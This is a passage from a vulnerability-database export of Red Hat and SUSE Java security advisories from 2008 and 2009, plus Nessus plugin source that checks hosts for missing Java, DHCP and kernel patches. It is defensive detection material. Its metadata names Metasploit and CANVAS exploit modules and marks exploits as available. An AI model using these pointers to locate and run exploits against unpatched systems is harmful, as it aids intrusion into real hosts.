These\nvulnerabilities are summarized on the IBM \"Security alerts\" page listed in\nthe References section. (CVE-2008-5340, CVE-2008-5341, CVE-2008-5342,\nCVE-2008-5343, CVE-2008-5351, CVE-2008-5356, CVE-2008-5357, CVE-2008-5358)\n\nAll users of java-1.6.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.6.0 SR4 Java release. All running instances\nof IBM Java must be restarted for the update to take effect.", "modified": "2017-09-08T12:20:12", "published": "2009-03-25T04:00:00", "id": "RHSA-2009:0369", "href": "https://access.redhat.com/errata/RHSA-2009:0369", "type": "redhat", "title": "(RHSA-2009:0369) Critical: java-1.6.0-ibm security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:35:22", "bulletinFamily": "unix", "description": "The Sun 1.6.0 Java release includes the Sun Java 6 Runtime Environment and\nthe Sun Java 6 Software Development Kit.\n\nThis update fixes several vulnerabilities in the Sun Java 6 Runtime\nEnvironment and the Sun Java 6 Software Development Kit. These\nvulnerabilities are summarized on the \"Advance notification of Security\nUpdates for Java SE\" page from Sun Microsystems, listed in the References\nsection. (CVE-2006-2426, CVE-2009-1093, CVE-2009-1094, CVE-2009-1095,\nCVE-2009-1096, CVE-2009-1097, CVE-2009-1098, CVE-2009-1099, CVE-2009-1100,\nCVE-2009-1101, CVE-2009-1102, CVE-2009-1103, CVE-2009-1104, CVE-2009-1105,\nCVE-2009-1106, CVE-2009-1107)\n\nUsers of java-1.6.0-sun should upgrade to these updated packages, which\ncorrect these issues. All running instances of Sun Java must be restarted\nfor the update to take effect.", "modified": "2017-07-27T11:46:53", "published": "2009-03-26T04:00:00", "id": "RHSA-2009:0392", "href": "https://access.redhat.com/errata/RHSA-2009:0392", "type": "redhat", "title": "(RHSA-2009:0392) Critical: java-1.6.0-sun security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:09", "bulletinFamily": "unix", "description": "This update corrects several security vulnerabilities in the IBM Java 2\nRuntime Environment and the IBM Java 2 Software Development Kit, shipped as\npart of Red Hat Network Satellite Server. In a typical operating\nenvironment, these are of low security risk as the runtime is not used on\nuntrusted applets.\n\nSeveral vulnerabilities were discovered in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM \"Security alerts\" page listed in\nthe References section. (CVE-2008-3103, CVE-2008-5345, CVE-2008-5346,\nCVE-2008-5348, CVE-2008-5349, CVE-2008-5350, CVE-2008-5351, CVE-2008-5352,\nCVE-2008-5353, CVE-2008-5354, CVE-2008-5356, CVE-2008-5357, CVE-2008-5359,\nCVE-2008-5360)\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR9 Java release. All running instances\nof IBM Java must be restarted for the update to take effect.", "modified": "2016-04-04T18:36:43", "published": "2009-05-07T04:00:00", "id": "RHSA-2009:0466", "href": "https://access.redhat.com/errata/RHSA-2009:0466", "type": "redhat", "title": "(RHSA-2009:0466) Low: java-1.5.0-ibm security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:35:28", "bulletinFamily": "unix", "description": "The IBM Java 1.4.2 JDK and JRE were brought to Service Release 13 and the IBM JDK and JRE 6 were brought to Service Release 4.\n#### Solution\nThere is no known workaround, please install the update packages.", "modified": "2009-04-07T14:51:07", "published": "2009-04-07T14:51:07", "id": "SUSE-SA:2009:018", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-04/msg00004.html", "type": "suse", "title": "remote code execution in IBM Java 1.4.2 and 6", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:19:44", "bulletinFamily": "unix", "description": "The IBM Java JRE 5 was brought to Service Release 9 fixing quite a number of security issues and bugs.\n#### Solution\nThere is no known workaround, please install the update packages.", "modified": "2009-01-29T14:08:00", "published": "2009-01-29T14:08:00", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-01/msg00009.html", "id": "SUSE-SA:2009:007", "title": "local privilege escalation in IBMJava5-JRE,java-1_5_0-ibm", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:22:58", "bulletinFamily": "unix", "description": "Sun Java received several security fixes and was updated to: - Sun Java 1.6.0 to Update 11-b03 - Sun Java 1.5.0 to Update 17 - Sun Java 1.4.2 to Update 19 Numerous security issues such as privilege escalations, and sandbox breakouts were fixed. (CVE-2008-5360, CVE-2008-5359, CVE-2008-5358, CVE-2008-5357, CVE-2008-5356, CVE-2008-5344, CVE-2008-5343, CVE-2008-5342, CVE-2008-5341, CVE-2008-5340, CVE-2008-5339, CVE-2008-2086, CVE-2008-5355, CVE-2008-5354, CVE-2008-5353, CVE-2008-5352, CVE-2008-5351, CVE-2008-5350, CVE-2008-5349, CVE-2008-5348, CVE-2008-5347, CVE-2008-5345, CVE-2008-5346)\n#### Solution\nThere is no known workaround, please install the update packages.", "modified": "2009-01-09T15:49:38", "published": "2009-01-09T15:49:38", "id": "SUSE-SA:2009:001", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-01/msg00001.html", "type": "suse", "title": "remote code execution in Sun Java", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:39:50", "bulletinFamily": "unix", "description": "The update brings IBM Java 5 to SR9-SSU.\n#### Solution\nThere is no known workaround, please install the update packages.", "modified": "2009-05-25T13:39:41", "published": "2009-05-25T13:39:41", "id": "SUSE-SA:2009:029", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-05/msg00003.html", "title": "remote code execution in IBM JDK 5", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:40:12", "bulletinFamily": "unix", "description": "The Sun JDK 5 was updated to Update18 and the Sun JDK 6 was updated to Update 13 to fix various bugs and security issues.\n#### Solution\nThere is no known workaround, please install the update packages.", "modified": "2009-04-03T13:04:22", "published": "2009-04-03T13:04:22", "id": "SUSE-SA:2009:016", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-04/msg00001.html", "type": "suse", "title": "remote code execution in Sun Java 5 and 6", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2020-03-18T01:16:41", "bulletinFamily": "scanner", "description": "The remote Mac OS X 10.5 host is running a version of Java for\nMac OS X that is missing Update 4.\n\nThe remote version of this software contains several security\nvulnerabilities. A remote attacker could exploit these issues to\nbypass security restrictions, disclose sensitive information, cause a\ndenial of service, or escalate privileges.", "modified": "2009-06-17T00:00:00", "id": "MACOSX_JAVA_10_5_UPDATE4.NASL", "href": "https://www.tenable.com/plugins/nessus/39435", "published": "2009-06-17T00:00:00", "title": "Mac OS X : Java for Mac OS X 10.5 Update 4", "type": "nessus", "sourceData": "#TRUSTED 8b8cd4a52754ac6be75f4da84782e78c59d2862c1a09de5f9e8c823e6f128387805805d1a1033a182d9e1291f0fc4535745996a0f5a83531661cd970cb76a72f3bf4b6c9dbd21926710ad443bcea1a2eda3d6c67328cc0e4746b0e20eb1bd1fd8baaa8ecd4e1a3fc4451a1e13367d89ff78373bdc562971e572313b854c309c2e54e0d455c6b3afefd993bf00cb52d9bc89be923b409c60155f5bef8ec3db12b8d2786235090a75d722aff3ff0e289014203ea1d1779d8949e2ab969cd86e8b892e8d57eec452200a14785d67c4d28ed258cc4862a7c0c4d2f94f57f82e5a437eec15cddf7de27ae6c29f31d5c6fd600f303790c1a0edc1e2319f246d88909d0db39a5664be1ec5d516708c4e7ec298660468be71ebc8a17caf7be3f8bafbc0c27c476e6d051f1644a9d3a835a03f054b31e68a5d2561d845554a50576983b6e59ca9d96be4c00f5d0d0be522d94b6f8be8c8c7b7e624f083e6a17decf15bd3bce68342d0560d195867502c57f8e1a3cb5e1cfb0af13e43580bf706288140495b85ffd499a4876d5b92043ef0d6ab9f25572b5815777f8f67d0dc5e8a9d09a3e11512fc67669cf652070123d443afcd375e16e06c36600dd183b8512ba8cb270cf8a0efa76fb3750f00f8c05fd7d50034943fcc37f49c70e3e0d4d1e1b5d0dbe322f67f0ac3f543dea2830c6b94acb79ab3779b084b4a4986750849a0b59f66e\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(39435);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2018/07/14\");\n\n script_cve_id(\n \"CVE-2008-2086\",\n \"CVE-2008-5339\",\n \"CVE-2008-5340\",\n \"CVE-2008-5341\",\n \"CVE-2008-5342\",\n \"CVE-2008-5343\",\n \"CVE-2008-5344\",\n \"CVE-2008-5345\",\n \"CVE-2008-5346\",\n \"CVE-2008-5347\",\n \"CVE-2008-5348\",\n \"CVE-2008-5349\",\n \"CVE-2008-5350\",\n \"CVE-2008-5351\",\n \"CVE-2008-5352\",\n \"CVE-2008-5353\",\n \"CVE-2008-5354\",\n \"CVE-2008-5356\",\n \"CVE-2008-5357\",\n \"CVE-2008-5359\",\n \"CVE-2008-5360\",\n \"CVE-2009-1093\",\n \"CVE-2009-1094\",\n \"CVE-2009-1095\",\n \"CVE-2009-1096\",\n \"CVE-2009-1097\",\n \"CVE-2009-1098\",\n \"CVE-2009-1099\",\n \"CVE-2009-1100\",\n \"CVE-2009-1101\",\n \"CVE-2009-1103\",\n \"CVE-2009-1104\",\n \"CVE-2009-1106\",\n \"CVE-2009-1107\",\n \"CVE-2009-1719\"\n );\n script_bugtraq_id(32620, 32892, 32608, 34240, 35381);\n script_xref(name:\"Secunia\", value:\"35118\");\n\n script_name(english:\"Mac OS X : Java for Mac OS X 10.5 Update 4\");\n script_summary(english:\"Checks version of the JavaVM framework\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote host has a version of Java that is affected by multiple\nvulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote Mac OS X 10.5 host is running a version of Java for\nMac OS X that is missing Update 4.\n\nThe remote version of this software contains several security\nvulnerabilities. A remote attacker could exploit these issues to\nbypass security restrictions, disclose sensitive information, cause a\ndenial of service, or escalate privileges.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.apple.com/kb/HT3632\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.apple.com/archives/Security-announce/2009/Jun/msg00003.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade to Java for Mac OS X 10.5 Update 4 (JavaVM Framework 12.3.0)\nor later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/06/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/06/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\");\n\n exit(0);\n}\n\n\ninclude(\"misc_func.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"macosx_func.inc\");\n\n\n\nif(sshlib::get_support_level() >= sshlib::SSH_LIB_SUPPORTS_COMMANDS)\n enable_ssh_wrappers();\nelse disable_ssh_wrappers();\n\nfunction exec(cmd)\n{\n local_var buf, ret;\n\n if (islocalhost())\n buf = pread(cmd:\"/bin/bash\", argv:make_list(\"bash\", \"-c\", cmd));\n else\n {\n ret = ssh_open_connection();\n if (!ret) exit(1, \"ssh_open_connection() failed.\");\n buf = ssh_cmd(cmd:cmd);\n ssh_close_connection();\n }\n if (buf !~ \"^[0-9]\") exit(1, \"Failed to get the version - '\"+buf+\"'.\");\n return buf;\n}\n\n\npackages = get_kb_item(\"Host/MacOSX/packages\");\nif (!packages) exit(1, \"The 'Host/MacOSX/packages' KB item is missing.\");\n\nuname = get_kb_item(\"Host/uname\");\nif (!uname) exit(1, \"The 'Host/uname' KB item is missing.\");\n\n\n# Mac OS X 10.5 only.\nif (egrep(pattern:\"Darwin.* 9\\.\", string:uname))\n{\n plist = \"/System/Library/Frameworks/JavaVM.framework/Versions/A/Resources/version.plist\";\n cmd = string(\n \"cat \", plist, \" | \",\n \"grep -A 1 CFBundleVersion | \",\n \"tail -n 1 | \",\n 'sed \\'s/.*string>\\\\(.*\\\\)<\\\\/string>.*/\\\\1/g\\''\n );\n version = exec(cmd:cmd);\n if (!strlen(version)) exit(1, \"Failed to get version info from '\"+plist+\"'.\");\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n # Fixed in version 12.3.0\n if (\n ver[0] < 12 ||\n (ver[0] == 12 && ver[1] < 3)\n )\n {\n gs_opt = get_kb_item(\"global_settings/report_verbosity\");\n if (gs_opt && gs_opt != 'Quiet')\n {\n report =\n '\\n Installed version : ' + version +\n '\\n Fixed version : 12.3.0\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n }\n else exit(0, \"The remote host is not affected since JavaVM Framework \" + version + \" is installed.\");\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-01T05:01:42", "bulletinFamily": "scanner", "description": "a. Service Console update for DHCP and third-party library update\n for DHCP client.\n\n DHCP is an Internet-standard protocol by which a computer can be\n connected to a local network, ask to be given configuration\n information, and receive from a server enough information to\n configure itself as a member of that network.\n\n A stack-based buffer overflow in the script_write_params method in\n ISC DHCP dhclient allows remote DHCP servers to execute arbitrary\n code via a crafted subnet-mask option.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2009-0692 to this issue.\n\n An insecure temporary file use flaw was discovered in the DHCP\n daemon", "modified": "2020-06-02T00:00:00", "id": "VMWARE_VMSA-2009-0014.NASL", "href": "https://www.tenable.com/plugins/nessus/42179", "published": "2009-10-19T00:00:00", "title": "VMSA-2009-0014 : VMware ESX patches for DHCP, Service Console kernel, and JRE resolve multiple security issues", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from VMware Security Advisory 2009-0014. \n# The text itself is copyright (C) VMware Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(42179);\n script_version(\"1.32\");\n script_cvs_date(\"Date: 2018/08/06 14:03:16\");\n\n script_cve_id(\"CVE-2007-6063\", \"CVE-2008-0598\", \"CVE-2008-2086\", \"CVE-2008-2136\", \"CVE-2008-2812\", \"CVE-2008-3275\", \"CVE-2008-3525\", \"CVE-2008-4210\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5349\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5355\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\", \"CVE-2009-0692\", \"CVE-2009-1093\", \"CVE-2009-1094\", \"CVE-2009-1095\", \"CVE-2009-1096\", \"CVE-2009-1097\", \"CVE-2009-1098\", \"CVE-2009-1099\", \"CVE-2009-1100\", \"CVE-2009-1101\", \"CVE-2009-1102\", \"CVE-2009-1103\", \"CVE-2009-1104\", \"CVE-2009-1105\", \"CVE-2009-1106\", \"CVE-2009-1107\", \"CVE-2009-1893\");\n script_bugtraq_id(35668);\n script_xref(name:\"VMSA\", value:\"2009-0014\");\n\n script_name(english:\"VMSA-2009-0014 : VMware ESX patches for DHCP, Service Console kernel, and JRE resolve multiple security issues\");\n script_summary(english:\"Checks esxupdate output for the patches\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote VMware ESX host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"a. Service Console update for DHCP and third-party library update\n for DHCP client.\n\n DHCP is an Internet-standard protocol by which a computer can be\n connected to a local network, ask to be given configuration\n information, and receive from a server enough information to\n configure itself as a member of that network.\n\n A stack-based buffer overflow in the script_write_params method in\n ISC DHCP dhclient allows remote DHCP servers to execute arbitrary\n code via a crafted subnet-mask option.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2009-0692 to this issue.\n\n An insecure temporary file use flaw was discovered in the DHCP\n daemon's init script ('/etc/init.d/dhcpd'). A local attacker could\n use this flaw to overwrite an arbitrary file with the output of the\n 'dhcpd -t' command via a symbolic link attack, if a system\n administrator executed the DHCP init script with the 'configtest',\n 'restart', or 'reload' option.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2009-1893 to this issue.\n\nb. Updated Service Console package kernel\n\n Service Console package kernel update to version\n kernel-2.4.21-58.EL.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2008-4210, CVE-2008-3275, CVE-2008-0598,\n CVE-2008-2136, CVE-2008-2812, CVE-2007-6063, CVE-2008-3525 to the\n security issues fixed in kernel-2.4.21-58.EL\n\nc. JRE Security Update\n\n JRE update to version 1.5.0_18, which addresses multiple security\n issues that existed in earlier releases of JRE.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has\n assigned the following names to the security issues fixed in\n JRE 1.5.0_17: CVE-2008-2086, CVE-2008-5347, CVE-2008-5348,\n CVE-2008-5349, CVE-2008-5350, CVE-2008-5351, CVE-2008-5352,\n CVE-2008-5353, CVE-2008-5354, CVE-2008-5356, CVE-2008-5357,\n CVE-2008-5358, CVE-2008-5359, CVE-2008-5360, CVE-2008-5339,\n CVE-2008-5342, CVE-2008-5344, CVE-2008-5345, CVE-2008-5346,\n CVE-2008-5340, CVE-2008-5341, CVE-2008-5343, and CVE-2008-5355.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has\n assigned the following names to the security issues fixed in\n JRE 1.5.0_18: CVE-2009-1093, CVE-2009-1094, CVE-2009-1095,\n CVE-2009-1096, CVE-2009-1097, CVE-2009-1098, CVE-2009-1099,\n CVE-2009-1100, CVE-2009-1101, CVE-2009-1102, CVE-2009-1103,\n CVE-2009-1104, CVE-2009-1105, CVE-2009-1106, and CVE-2009-1107.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.vmware.com/pipermail/security-announce/2010/000076.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply the missing patches.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 20, 59, 94, 119, 189, 200, 264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:3.0.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:3.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/10/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"VMware ESX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/VMware/release\", \"Host/VMware/version\");\n script_require_ports(\"Host/VMware/esxupdate\", \"Host/VMware/esxcli_software_vibs\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"vmware_esx_packages.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/VMware/release\")) audit(AUDIT_OS_NOT, \"VMware ESX / ESXi\");\nif (\n !get_kb_item(\"Host/VMware/esxcli_software_vibs\") &&\n !get_kb_item(\"Host/VMware/esxupdate\")\n) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ninit_esx_check(date:\"2009-10-16\");\nflag = 0;\n\n\nif (esx_check(ver:\"ESX 3.0.3\", patch:\"ESX303-200910402-SG\")) flag++;\n\nif (\n esx_check(\n ver : \"ESX 3.5.0\",\n patch : \"ESX350-200910401-SG\",\n patch_updates : make_list(\"ESX350-200911201-UG\", \"ESX350-Update05\", \"ESX350-Update05a\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 3.5.0\",\n patch : \"ESX350-200910403-SG\",\n patch_updates : make_list(\"ESX350-201003403-SG\", \"ESX350-201203401-SG\", \"ESX350-Update05\", \"ESX350-Update05a\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 3.5.0\",\n patch : \"ESX350-200910406-SG\",\n patch_updates : make_list(\"ESX350-201203405-SG\", \"ESX350-Update05\", \"ESX350-Update05a\")\n )\n) flag++;\n\nif (\n esx_check(\n ver : \"ESX 4.0\",\n patch : \"ESX400-200912404-SG\",\n patch_updates : make_list(\"ESX400-Update02\", \"ESX400-Update03\", \"ESX400-Update04\")\n )\n) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:esx_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-01T03:47:52", "bulletinFamily": "scanner", "description": "Updated java-1.5.0-ibm packages that fix several security issues are\nnow available for Red Hat Enterprise Linux 4 Extras and 5\nSupplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment\nand the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These are\nsummarized in the ", "modified": "2020-06-02T00:00:00", "id": "REDHAT-RHSA-2009-0016.NASL", "href": "https://www.tenable.com/plugins/nessus/40738", "published": "2009-08-24T00:00:00", "title": "RHEL 4 / 5 : java-1.5.0-ibm (RHSA-2009:0016)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:0016. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40738);\n script_version (\"1.31\");\n script_cvs_date(\"Date: 2019/10/25 13:36:13\");\n\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \"CVE-2008-5348\", \"CVE-2008-5349\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n script_bugtraq_id(32608, 32620, 32892);\n script_xref(name:\"RHSA\", value:\"2009:0016\");\n\n script_name(english:\"RHEL 4 / 5 : java-1.5.0-ibm (RHSA-2009:0016)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated java-1.5.0-ibm packages that fix several security issues are\nnow available for Red Hat Enterprise Linux 4 Extras and 5\nSupplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment\nand the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These are\nsummarized in the 'Security Alerts' from IBM.\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR9 Java release.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-2086\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5339\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5340\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5341\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5343\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5344\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5345\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5346\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5348\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5349\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5350\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5351\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5352\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5353\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5354\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5356\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5357\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5359\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5360\"\n );\n # http://www-128.ibm.com/developerworks/java/jdk/alerts/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.ibm.com/us-en/?ar=1\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2009:0016\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n 